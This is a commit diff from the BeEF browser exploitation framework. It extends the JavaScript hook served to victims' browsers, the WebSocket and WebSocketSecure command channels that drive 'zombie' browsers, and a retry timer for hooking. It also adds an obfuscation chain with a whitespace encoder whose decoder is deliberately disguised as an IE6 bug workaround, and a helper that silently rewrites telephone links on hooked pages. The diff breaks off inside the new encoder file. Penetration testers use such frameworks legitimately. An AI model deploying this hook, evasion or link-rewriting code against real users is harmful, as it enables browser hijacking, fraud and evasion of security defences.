Social Eng. extension: moved the extension config line in main config file.

Simple_hijacker module (Social engineering): Awesome, merging it straight away ;)

.gitignore

@@ -1,3 +1,4 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
+extensions/social_engineering/web_cloner/cloned_pages

VERSION

@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.6-alpha
+0.4.3.7-alpha

beef

@@ -81,7 +81,7 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
   when "sqlite"
     DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
@@ -124,12 +124,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 #@note Starts the WebSocket server
 if config.get("beef.http.websocket.enable")
   BeEF::Core::Websocket::Websocket.instance
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  if config.get("beef.http.websocket.secure")
+    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  end
 end
 
 
-
-
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
 
@@ -140,7 +141,7 @@ if config.get("beef.extension.console.shell.enable") == true
   begin
     FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
     BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
   rescue Interrupt
   end
 else

config.yaml

@@ -16,16 +16,16 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.6-alpha'
+    version: '0.4.3.7-alpha'
     debug: false
 
     restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of browser ip addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
+        # subnet of browser ip addresses that can connect to the UI
         # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
-    
+
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
@@ -42,8 +42,9 @@ beef:
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: false # use WebSocketSecure
-          port: 61985 # good success rate through proxies
+          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          port: 61985 # WS: good success rate through proxies
+          secure_port: 61986 # WSS
           alive_timer: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -68,7 +69,7 @@ beef:
 
         # db_file is only used for sqlite
         db_file: "beef.db"
-        
+
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
         db_name: "beef"
@@ -86,13 +87,15 @@ beef:
     # You may override default extension configuration parameters here
     extension:
         requester:
-            enable: true 
+            enable: true
         proxy:
-            enable: true 
+            enable: true
         metasploit:
             enable: false
-        console:
-            shell:
-                enable: false
+        social_engineering:
+            enable: false
         evasion:
             enable: false
+        console:
+             shell:
+                enable: false

core/main/client/are.js

@@ -1,4 +1,18 @@
-
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
 beef.are = {
   init:function(){
    var Jools = require('jools');

core/main/client/browser.js

@@ -188,12 +188,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
 	},
 
+	/**
+	 * Returns true if FF15
+	 * @example: beef.browser.isFF15()
+	 */
+	isFF15: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15();
 	},
 
 	/**
@@ -463,6 +471,7 @@ beef.browser = {
 			FF12:	this.isFF12(),	// Firefox 12
 			FF13:	this.isFF13(),	// Firefox 13
 			FF14:	this.isFF14(),	// Firefox 14
+			FF15:	this.isFF15(),	// Firefox 15
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -526,6 +535,7 @@ beef.browser = {
 		if (this.isFF12())	{ return '12' };	// Firefox 12
 		if (this.isFF13())	{ return '13' };	// Firefox 13
 		if (this.isFF14())	{ return '14' };	// Firefox 14
+		if (this.isFF15())  { return '15' };    // Firefox 15
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
@@ -605,8 +615,8 @@ beef.browser = {
 	 * Checks if the Phonegap API is available from the hooked domain.
 	 * @return: {Boolean} true or false.
 	 *
-	 * @example: if(beef.browser.hasJava()) { ... }
-	*/
+	 * @example: if(beef.browser.hasPhonegap()) { ... }
+	 */
 	hasPhonegap: function() {
 		var result = false;
 		try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +624,21 @@ beef.browser = {
 		return result;
 	},
 
+	/**
+	 * Checks if the browser supports CORS
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.hasCors()) { ... }
+	 */
+	hasCors: function() {
+		if ('withCredentials' in new XMLHttpRequest())
+			return true;	
+		else if (typeof XDomainRequest !== "undefined")
+			return true;
+		else
+			return false;
+	},
+
 	/**
 	 * Checks if the zombie has Java installed and enabled.
 	 * @return: {Boolean} true or false.

core/main/client/dom.js

@@ -194,6 +194,31 @@ beef.dom = {
 		return count;
 	},
 
+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
     /**
      *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
      * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]

core/main/client/timeout.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-domain situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);

core/main/client/websocket.js

@@ -27,15 +27,18 @@ beef.websocket = {
         var webSocketPort = <%= @websocket_port %>;
         var webSocketSecure = <%= @websocket_secure %>;
         var protocol = "ws://";
-
-        if(webSocketSecure)
+        //console.log("We are inside init");
+        /*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
+        if(webSocketSecure && window.location.protocol=="https:"){
             protocol = "wss://";
+        webSocketPort= <%= @websocket_sec_port %>;
+        }
 
-        if (beef.browser.isFF() && !!window.MozWebSocket) {
-            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+    if (beef.browser.isFF() && !!window.MozWebSocket) {
+        beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
 
         } else {
-            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
         }
 
     },
@@ -43,10 +46,10 @@ beef.websocket = {
     start:function () {
         new beef.websocket.init();
         this.socket.onopen = function () {
-            //console.log("Socket has been opened!");
+        //console.log("Socket has been opened!");
 
-            /*send browser id*/
-            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
+        /*send browser id*/
+        beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
             //console.log("Connected and Helo");
             beef.websocket.alive();
         }

core/main/handlers/modules/beefjs.rb

@@ -14,126 +14,151 @@
 #   limitations under the License.
 #
 module BeEF
-module Core
-module Handlers
-module Modules
+  module Core
+    module Handlers
+      module Modules
 
-  # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
+        # @note Purpose: avoid rewriting several times the same code.
+        module BeEFJS
 
-    # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
-      config = BeEF::Core::Configuration.instance
-      # @note set up values required to construct beefjs
-      beefjs = ''
-      # @note location of sub files
-      beefjs_path = "#{$root_dir}/core/main/client/"
-      # @note we load websocket library only if ws server is enabled in config.yalm
-      # check in init.js
-      if config.get("beef.http.websocket.enable")
+          # Builds the default beefjs library (all default components of the library).
+          # @param [Object] req_host The request object
+          def build_beefjs!(req_host)
+            config = BeEF::Core::Configuration.instance
+            # @note set up values required to construct beefjs
+            beef_js = ''
+            # @note location of sub files
+            beef_js_path = "#{$root_dir}/core/main/client/"
 
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
-      else
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
 
+            # @note Load websocket library only if WS server is enabled in config.yaml
+            if config.get("beef.http.websocket.enable") == false
+              # @note BeEF libraries: need Eruby evaluation and obfuscation                                                                                                                           #antisnatchor: leave timeout.js as the last one!
+              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
+            else                                                                                                                                                                                                   #antisnatchor: leave timeout.js as the last one!
+              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
+            end
 
-      end
+            ext_js_to_obfuscate = ''
+            ext_js_to_not_obfuscate = ''
 
-      # @note construct the beefjs string from file(s)
-      js_sub_files.each {|js_sub_file_name|
-        js_sub_file_abs_path = beefjs_path + js_sub_file_name
-        beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
-      }
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
+            ext_js_sub_files.each{ |ext_js_sub_file|
+              if config.get("beef.extension.evasion.enable")
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
+                  # do not obfuscate the file
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                else
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                end
+              else
+                # Evasion is not enabled, do not obfuscate anything
+                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+              end
+            }
 
-      # @note create the config for the hooked browser session
+            # @note construct the beef_js string from file(s)
+            beef_js_sub_files.each { |beef_js_sub_file|
+              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
+              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
+            }
 
-      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_config = BeEF::Core::Server.instance.to_h
+            # @note create the config for the hooked browser session
+            hook_session_config = BeEF::Core::Server.instance.to_h
 
-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
-      if hook_session_config['beef_host'].eql? "0.0.0.0"
-        hook_session_config['beef_host'] = req_host
-        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
-      end
+            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            if hook_session_config['beef_host'].eql? "0.0.0.0"
+              hook_session_config['beef_host'] = req_host
+              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
+            end
 
-      # @note if http_port <> public_port in config ini, use the public_port
-      unless hook_session_config['beef_public_port'].nil?
-        if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
-          hook_session_config['beef_port'] = hook_session_config['beef_public_port']
-          hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
-          if hook_session_config['beef_public_port'] == '443'
-            hook_session_config['beef_url'].sub!(/http:/, 'https:')
+            # @note if http_port <> public_port in config ini, use the public_port
+            unless hook_session_config['beef_public_port'].nil?
+              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if hook_session_config['beef_public_port'] == '443'
+                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                end
+              end
+            end
+
+            # @note Set some WebSocket properties
+            if config.get("beef.http.websocket.enable")
+              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
+              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
+              hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
+              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
+            end
+
+            # @note populate place holders in the beef_js string and set the response body
+            eruby = Erubis::FastEruby.new(beef_js)
+            @hook = eruby.evaluate(hook_session_config)
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+            else
+              @final_hook = ext_js_to_not_obfuscate + @hook
+            end
+
+            # @note Return the final hook to be sent to the browser
+            @body << @final_hook
+
+          end
+
+          # Finds the path to js components
+          # @param [String] component Name of component
+          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
+          def find_beefjs_component_path(component)
+            component_path = component
+            component_path.gsub!(/beef./, '')
+            component_path.gsub!(/\./, '/')
+            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+            return false if not File.exists? component_path
+
+            component_path
+          end
+
+          # Builds missing beefjs components.
+          # @param [Array] beefjs_components An array of component names
+          def build_missing_beefjs_components(beefjs_components)
+            # @note verifies that @beef_js_cmps is not nil to avoid bugs
+            @beef_js_cmps = '' if @beef_js_cmps.nil?
+
+            if beefjs_components.is_a? String
+              beefjs_components_path = find_beefjs_component_path(beefjs_components)
+              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
+              beefjs_components = {beefjs_components => beefjs_components_path}
+            end
+
+            beefjs_components.keys.each { |k|
+              next if @beef_js_cmps.include? beefjs_components[k]
+
+              # @note path to the component
+              component_path = beefjs_components[k]
+
+              # @note we output the component to the hooked browser
+              @body << File.read(component_path)+"\n\n"
+
+              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
+              if @beef_js_cmps.eql? ''
+                @beef_js_cmps = component_path
+              else
+                @beef_js_cmps += ",#{component_path}"
+              end
+            }
           end
         end
       end
-
-      if config.get("beef.http.websocket.enable")
-        hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
-        hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
-        hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
-      end
-      
-      # @note populate place holders in the beefjs string and set the response body
-      eruby = Erubis::FastEruby.new(beefjs)
-      @hook = eruby.evaluate(hook_session_config)
-
-      if config.get("beef.extension.evasion.enable")
-        evasion = BeEF::Extension::Evasion::Evasion.instance
-        @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
-      end
-
-      @body << @hook
-
     end
-
-    # Finds the path to js components
-    # @param [String] component Name of component
-    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
-    def find_beefjs_component_path(component)
-      component_path = component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-
-      return false if not File.exists? component_path
-
-      component_path
-    end
-
-    # Builds missing beefjs components.
-    # @param [Array] beefjs_components An array of component names
-    def build_missing_beefjs_components(beefjs_components)
-      # @note verifies that @beef_js_cmps is not nil to avoid bugs
-      @beef_js_cmps = '' if @beef_js_cmps.nil?
-
-      if beefjs_components.is_a? String
-        beefjs_components_path = find_beefjs_component_path(beefjs_components)
-        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
-        beefjs_components = {beefjs_components => beefjs_components_path}
-      end
-
-      beefjs_components.keys.each {|k|
-        next if @beef_js_cmps.include? beefjs_components[k]
-
-        # @note path to the component
-        component_path = beefjs_components[k]
-
-        # @note we output the component to the hooked browser
-        @body << File.read(component_path)+"\n\n"
-
-        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
-        if @beef_js_cmps.eql? ''
-          @beef_js_cmps = component_path
-        else
-          @beef_js_cmps += ",#{component_path}"
-        end
-      }
-    end
-
   end
-
-end
-end
-end
 end

core/main/network_stack/websocket/websocket.rb

@@ -27,17 +27,156 @@ module BeEF
         @@activeSocket= Hash.new
         @@lastalive= Hash.new
         @@config = BeEF::Core::Configuration.instance
+        #@@wsopt=nil
         MOUNTS = BeEF::Core::Server.instance.mounts
 
         def initialize
-          port = @@config.get("beef.http.websocket.port")
+
+
           secure = @@config.get("beef.http.websocket.secure")
+          @root_dir = File.expand_path('../../../../../', __FILE__)
+
+          if (secure)
+            ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
+                     :tls_options => {
+                         :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+                         :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+                     }
+            }
+            # @note Start a WSS server socket
+            start_websocket_server(ws_secure_options, true)
+          end
+
+          # @note Start a WS server socket
+          ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
+          start_websocket_server(ws_options,false)
+
+          #  #Thread for websocket-secure
+          #  Thread.new {
+          #    port = @@config.get("beef.http.websocket.secure_port")
+          #    sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #    EventMachine.run {
+          #
+          #      wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
+          #               :tls_options => {
+          #                   :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+          #                   :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+          #               }
+          #      }
+          #
+          #
+          #      EventMachine::WebSocket.start(wsopt) do |ws|
+          #        begin
+          #          print_debug "New WebSocket-secured channel open."
+          #          ws.onmessage { |msg|
+          #            msg_hash = JSON.parse("#{msg}")
+          #            #@note messageHash[result] is Base64 encoded
+          #            if (msg_hash["cookie"]!= nil)
+          #              print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
+          #              #insert new connection in activesocket
+          #              @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #              print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
+          #            elsif msg_hash["alive"] != nil
+          #              hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #              unless hooked_browser.nil?
+          #                hooked_browser.lastseen = Time.new.to_i
+          #                hooked_browser.count!
+          #                hooked_browser.save
+          #
+          #                #Check if new modules need to be sent
+          #                zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #                zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #                #@todo antisnatchor:
+          #                #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #                #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #                dhook = BeEF::Extension::Requester::API::Hook.new
+          #                dhook.requester_run(hooked_browser, '')
+          #
+          #                #Check if new XssRays scan need to be started
+          #                xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #                xssrays.start_scan(hooked_browser, '')
+          #              end
+          #            else
+          #              #json recv is a cmd response decode and send all to
+          #              #we have to call dynamicreconstructor handler camp must be websocket
+          #              #print_debug("Received from WebSocket #{messageHash}")
+          #              execute(msg_hash)
+          #            end
+          #          }
+          #        rescue Exception => e
+          #          print_error "WebSocket-secured error: #{e}"
+          #        end
+          #      end
+          #    }
+          #
+          #  }
+          #
+          ##Thread for websocket
+          #Thread.new {
+          #  port = @@config.get("beef.http.websocket.port")
+          #  sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #  EventMachine.run {
+          #
+          #    wsopt = {:host => "0.0.0.0", :port => port}
+          #
+          #
+          #    EventMachine::WebSocket.start(wsopt) do |ws|
+          #      begin
+          #        print_debug "New WebSocket channel open."
+          #        ws.onmessage { |msg|
+          #          msg_hash = JSON.parse("#{msg}")
+          #          #@note messageHash[result] is Base64 encoded
+          #          if (msg_hash["cookie"]!= nil)
+          #            print_debug("WebSocket - Browser says helo! WebSocket is running")
+          #            #insert new connection in activesocket
+          #            @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #            print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+          #          elsif msg_hash["alive"] != nil
+          #            hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #            unless hooked_browser.nil?
+          #              hooked_browser.lastseen = Time.new.to_i
+          #              hooked_browser.count!
+          #              hooked_browser.save
+          #
+          #              #Check if new modules need to be sent
+          #              zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #              zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #              #@todo antisnatchor:
+          #              #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #              #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #              dhook = BeEF::Extension::Requester::API::Hook.new
+          #              dhook.requester_run(hooked_browser, '')
+          #
+          #              #Check if new XssRays scan need to be started
+          #              xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #              xssrays.start_scan(hooked_browser, '')
+          #            end
+          #          else
+          #            #json recv is a cmd response decode and send all to
+          #            #we have to call dynamicreconstructor handler camp must be websocket
+          #            #print_debug("Received from WebSocket #{messageHash}")
+          #            execute(msg_hash)
+          #          end
+          #        }
+          #      rescue Exception => e
+          #        print_error "WebSocket error: #{e}"
+          #      end
+          #    end
+          #  }
+          #}
+
+
+        end
+
+        def start_websocket_server(ws_options, secure)
           Thread.new {
             sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
-            EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
-              EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
+            EventMachine.run {
+              EventMachine::WebSocket.start(ws_options) do |ws|
                 begin
-                  print_debug "New WebSocket channel open."
+                  secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
                   ws.onmessage { |msg|
                     msg_hash = JSON.parse("#{msg}")
                     #@note messageHash[result] is Base64 encoded
@@ -80,7 +219,6 @@ module BeEF
               end
             }
           }
-
         end
 
         #@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +253,7 @@ module BeEF
           handler = data["handler"]
           if handler.match(/command/)
             BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
-                 @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
+                                                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
           else #processing results from extensions, call the right handler
             data["beefhook"] = hooked_browser
             data["results"] = JSON.parse(Base64.decode64(data["result"]))

core/main/server.rb

@@ -62,9 +62,9 @@ module BeEF
         raise Exception::TypeError, '"url" needs to be a string' if not url.string?
 
         if args == nil
-          mounts[url] = http_handler_class
+          @mounts[url] = http_handler_class
         else
-          mounts[url] = http_handler_class, *args
+          @mounts[url] = http_handler_class, *args
         end
         print_debug("Server: mounted handler '#{url}'")
       end

extensions/admin_ui/controllers/modules/modules.rb

@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     # append the number of command modules so the branch name results in: "<category name> (num)"
     parent.each {|command_module_branch|
       if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children')
-        num_of_command_modules = command_module_branch['children'].length
-        command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
-
+        num_of_subs = 0
         command_module_branch['children'].each {|c|
+          #add in the submodules and subtract 1 for the folder node
+          num_of_subs+=c['children'].length-1 if c.has_key?('children')
           retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder'
         }
+        num_of_command_modules = command_module_branch['children'].length + num_of_subs
+        command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
+
       end
     }
   end

extensions/evasion/config.yaml

@@ -16,13 +16,15 @@
 beef:
     extension:
         evasion:
-            enable: true 
+            enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            chain: ["scramble", "minify", "base_64"]
+            #chain: ["scramble", "minify"]
+            chain: ["minify", "base64", "whitespace"]

extensions/evasion/extension.rb

@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'

extensions/evasion/obfuscation/whitespace.rb

@@ -0,0 +1,68 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module Evasion
+      class Whitespace
+        include Singleton
+
+        def need_bootstrap
+          true
+        end
+        
+        def get_bootstrap
+        # the decode function is in plain text - called IE-spacer - because trolling is always a good idea
+        decode_function =
+"//Dirty IE6 whitespace bug hack
+function IE_spacer(css_space) {
+  var spacer = '';
+  for(y = 0; y < css_space.length/8; y++)
+  {
+    v = 0;
+    for(x = 0; x < 8; x++)
+    {
+      if(css_space.charCodeAt(x+(y*8)) > 9)
+      {
+        v++;
+      }
+      if(x != 7)
+      {
+        v = v << 1;
+      }
+    }
+    spacer += String.fromCharCode(v);
+  }return spacer;
+}"
